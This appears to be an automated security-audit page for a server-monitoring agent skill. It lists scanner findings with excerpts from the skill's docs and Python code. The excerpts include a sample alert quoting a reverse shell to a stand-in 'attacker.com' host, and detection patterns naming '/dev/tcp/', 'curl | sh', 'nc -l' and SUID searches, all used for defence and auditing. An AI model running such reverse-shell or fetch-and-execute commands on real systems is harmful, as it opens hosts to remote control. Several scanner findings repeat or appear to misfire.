Back to skill

Security audit

Security Monitor V15 T33

Security checks for vulnerabilities and agentic risk

Overview

This is a coherent server security-audit skill, but it asks for broad root-level inspection and can expose sensitive host data in reports or scheduled logs.

Install only if you administer the systems being scanned. Prefer targeted unprivileged checks first, use sudo only when a specific check requires it, and store reports or cron logs in protected locations because they may contain process arguments, log excerpts, usernames, internal paths, and secret locations.

Vulnerability Patterns
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (2)

T05 · Unauthorized Access and Privilege Escalation

Warning
Location
scripts/monitor.py:785
Finding

Default Full Scan Performs Broad Host-Wide Inspection Under Recommended Root Privileges

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/monitor.py:133
Finding

Unredacted Process Arguments and Log Excerpts Can Be Persisted in Reports

Content
View full analysis
> /var/log/security-monitor.log 2>&1 ``` ### Technical Analysis Process command lines frequently contain sensitive values supplied through command-line options, URLs, connection strings, environment wrapper ...[truncated 2481 chars]
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Rogue AgentSelf-Modification, Session Persistence
Findings (43)

YARA rule 'reverse_shell': Reverse shell patterns in scripts or source code [malware]

Critical
Category
YARA Match
Confidence
85% confidence
Finding

YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).

Content

Scanner excerpt · README.md (reported line 138)May include surrounding context.

输出示例

text
================================================================================
安全监控报告
时间: 2024-03-10 15:30:45
================================================================================

【高危问题】(共 2 项)
--------------------------------------------------------------------------------
1. [高危] 可疑进程: PID 12345 - 命令: bash -i >& /dev/tcp/attacker.com/4444 0>&1
2. [敏感信息泄露] API密钥 在 /opt/openclaw/config/app.conf

【警告信息】(共 3 项)
--------------------------------------------------------------------------------
1. 高CPU使用率进程: PID 9876 (85.2% CPU) - /usr/bin/python3 /opt/openclaw/app.py
2. 开放非标准端口: 8080 - 请确认是否为预期服务
3. 外部连接到非标准端口: 192.168.1.100:5432

================================================================================

安全建议

立即处理

  • 反弹shell、反向隧道等高�

YARA rule 'privilege_escalation_tools': Privilege escalation tools and techniques [hacktools]

High
Category
YARA Match
Confidence
75% confidence
Finding

YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

Content

Scanner excerpt · README.md (reported line 109)May include surrounding context.

can_secrets_in_files('/opt/openclaw', max_files=200) monitor.scan_secrets_in_files('/etc/openclaw', max_files=100) print(monitor.generate_report()) "

text

### 场景2: 发现可疑行为后快速诊断

```bash
# 1. 查看当前所有进程
ps auxf

# 2. 检查网络连接
ss -tunap

# 3. 查看最近的登录记录
last -n 20
lastb -n 20  # 失败登录

# 4. 检查SUID文件
find / -perm -4000 -type f 2>/dev/null

# 5. 运行监控脚本
sudo python3 scripts/monitor.py

场景3: 定期安全审计(设置Cron)

bash
# 编辑crontab
crontab -e

# 每天凌晨3点执行扫描,结果保存到日志
0 3 * * * /usr/bin/python3 /path/to/monitor.py >> /var/log/security-monitor.log 2>&1

# 每周日执行完整扫描并发送邮件
0 3 * * 0 /usr/bin/python3 /path/to/monitor.py | mail -s "安全扫描报告" admin@example.com

输出示例

text
================================================================================
安全�

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 22)May include surrounding context.

md
#### 1. 进程监控 (scripts/monitor.py:37-89)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 33)May include surrounding context.

md
#### 1. 进程监控 (scripts/monitor.py:37-89)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 39)May include surrounding context.

md
#### 1. 进程监控 (scripts/monitor.py:37-89)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 45)May include surrounding context.

md
#### 1. 进程监控 (scripts/monitor.py:37-89)

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 53)May include surrounding context.

md
#### 1. 进程监控 (scripts/monitor.py:37-89)

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-checklist.md (reported line 7)May include surrounding context.

md
### 系统账户 / System Accounts
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions

YARA rule 'privilege_escalation_tools': Privilege escalation tools and techniques [hacktools]

High
Category
YARA Match
Confidence
75% confidence
Finding

YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

Content

Scanner excerpt · references/security-checklist.md (reported line 20)May include surrounding context.

md
cation (disable password login)
- [ ] 更改SSH默认端口(从22改为非标准端口) / Change SSH default port (from 22 to non-standard port)
- [ ] 配置 `/etc/ssh/sshd_config`: / Configure `/etc/ssh/sshd_config`:
  - PermitRootLogin no
  - PasswordAuthentication no
  - Port <非标准端口> / Port <non-standard port>

### 文件权限 / File Permissions
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`

## 网络安全 / Network Security

### 防火墙配置 / Firewall Configuration
- [ ] 启用防火墙(ufw/iptables/firewalld) / Enable firewall (ufw/iptables/firewalld)
- [ ] 仅开放必要端口 / Only open necessary ports

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · SKILL.md (reported line 183)May include surrounding context.

md
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`

## 网络安全 / Network Security

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/security-checklist.md (reported line 23)May include surrounding context.

md
- [ ] 检查SUID/SGID文件: `find / -perm -4000 -o -perm -2000` / Check SUID/SGID files
- [ ] 确保系统关键文件不可写: `/etc`, `/usr/bin`, `/usr/sbin` / Ensure system critical files are not writable
- [ ] 检查全局可写文件: `find / -perm -o+w -type f` / Check globally writable files
- [ ] 审查 `~/.ssh/authorized_keys` 中的密钥 / Review keys in `~/.ssh/authorized_keys`

## 网络安全 / Network Security

External Script Fetching

High
Category
Supply Chain
Confidence
90% confidence
Finding

Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Content

Scanner excerpt · references/security-checklist.md (reported line 50)May include surrounding context.

md
### 可疑进程特征 / Suspicious Process Characteristics
- 反弹shell: `bash -i`, `nc -l` / Reverse shell
- 反向隧道: `ssh -R`, `socat TCP-LISTEN` / Reverse tunnel
- 下载并执行: `wget \| sh`, `curl \| sh` / Download and execute
- 编码命令: `base64 -d`, `xxd -r`

## 日志审计

External Script Fetching

High
Category
Supply Chain
Confidence
90% confidence
Finding

Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Content

Scanner excerpt · references/security-checklist.md (reported line 50)May include surrounding context.

md
### 可疑进程特征 / Suspicious Process Characteristics
- 反弹shell: `bash -i`, `nc -l` / Reverse shell
- 反向隧道: `ssh -R`, `socat TCP-LISTEN` / Reverse tunnel
- 下载并执行: `wget \| sh`, `curl \| sh` / Download and execute
- 编码命令: `base64 -d`, `xxd -r`

## 日志审计

Credential Access

High
Category
Privilege Escalation
Confidence
88% confidence
Finding

The script scans .env and other configuration files for secrets and then reports the file paths containing them. In a root-run monitoring context, this can expose the existence and locations of sensitive credentials to any user who can read the script's output or saved JSON results, increasing the blast radius of credential discovery.

Content

Scanner excerpt · scripts/monitor.py (reported line 304)May include surrounding context.

python
file_path = os.path.join(root, file)
                
                # 跳过二进制文件
                if file.endswith(('.log', '.txt', '.conf', '.ini', '.json', '.yml', '.yaml', '.env')):
                    try:
                        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                            content = f.read()

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · scripts/monitor.py (reported line 591)May include surrounding context.

python
r'bash -i',
            r'/dev/tcp/',
            r'python.*-c.*socket',
            r'chmod 777.*shadow',
            r'chmod 4755',
        ]

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
70% confidence
Finding

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

Content

Scanner excerpt · README.md (reported line 30)May include surrounding context.

cd /tmp/security-monitor

执行扫描(建议用root权限)

sudo python3 scripts/monitor.py

text

### 2. 针对性检查

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
70% confidence
Finding

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

Content

Scanner excerpt · README.md (reported line 112)May include surrounding context.

cd /tmp/security-monitor

执行扫描(建议用root权限)

sudo python3 scripts/monitor.py

text

### 2. 针对性检查

Session Persistence

Medium
Category
Rogue Agent
Confidence
85% confidence
Finding

Skill establishes unauthorized persistence across sessions via cron jobs, startup scripts, or state files. Session persistence allows an attacker to maintain access beyond the current interaction.

Content

Scanner excerpt · README.md (reported line 119)May include surrounding context.

bash
# 编辑crontab
crontab -e

# 每天凌晨3点执行扫描,结果保存到日志
0 3 * * * /usr/bin/python3 /path/to/monitor.py >> /var/log/security-monitor.log 2>&1

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

The listed triggers such as '用户要求检查服务器安全' and '分析可疑的系统活动' are high-level requests that could match many ordinary admin or troubleshooting conversations. The document does not provide exclusion conditions, negative examples, or narrower constraints to distinguish when this skill should activate versus more general assistance.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

The skill recommends root execution and broad inspection of processes, files, logs, and secrets without a prominent warning that scanning may expose sensitive data unrelated to the user's immediate request. In an agent setting, this can lead to excessive collection or disclosure of credentials, private logs, and system data under elevated privileges.

Content

No source excerpt is available for this finding.

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
86% confidence
Finding

Directly instructing users to run the tool with sudo elevates the consequences of any misuse, bug, or overbroad scan behavior. In a skill that inspects secrets, processes, logs, and permissions, root access significantly increases exposure of sensitive system-wide information and can normalize unnecessary privilege escalation.

Content

Scanner excerpt · SKILL.md (reported line 113)May include surrounding context.

建议以root权限运行以获取完整的进程和网络信息:

bash
sudo python3 .codebuddy/skills/security-monitor/scripts/monitor.py

非root权限运行时,部分检测项会受限,但仍可执行基础分析。

Session Persistence

Medium
Category
Rogue Agent
Confidence
85% confidence
Finding

Skill establishes unauthorized persistence across sessions via cron jobs, startup scripts, or state files. Session persistence allows an attacker to maintain access beyond the current interaction.

Content

Scanner excerpt · SKILL.md (reported line 182)May include surrounding context.

md
1. **日志分析** - 扫描 `/var/log/` 中的异常登录和失败记录
2. **进程树分析** - 检测父子进程的异常关系
3. **文件完整性** - 使用 `md5sum` 检测关键文件修改
4. **计划任务审计** - 检查 `/etc/cron.*` 和 `crontab -l`
5. **SSH密钥审计** - 检查 `~/.ssh/authorized_keys` 的可疑条目

### 注意事项

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
70% confidence
Finding

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

Content

Scanner excerpt · README.md (reported line 83)May include surrounding context.

md
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions

### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
70% confidence
Finding

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

Content

Scanner excerpt · references/security-checklist.md (reported line 9)May include surrounding context.

md
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions

### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)

Sudo/Root Execution

Medium
Category
Privilege Escalation
Confidence
70% confidence
Finding

Commands invoke sudo or root privileges. Verify this elevated access is necessary and justified.

Content

Scanner excerpt · scripts/monitor.py (reported line 964)May include surrounding context.

python
- [ ] 禁用不必要的系统账户 / Disable unnecessary system accounts
- [ ] 检查 `/etc/passwd` 中的UID为0的账户 / Check accounts with UID 0 in `/etc/passwd`
- [ ] 强制所有用户使用强密码 / Enforce strong passwords for all users
- [ ] 限制sudo权限 / Restrict sudo permissions

### 认证配置 / Authentication Configuration
- [ ] SSH仅允许密钥认证(禁用密码登录) / SSH only allows key authentication (disable password login)

Static analysis

No suspicious patterns detected.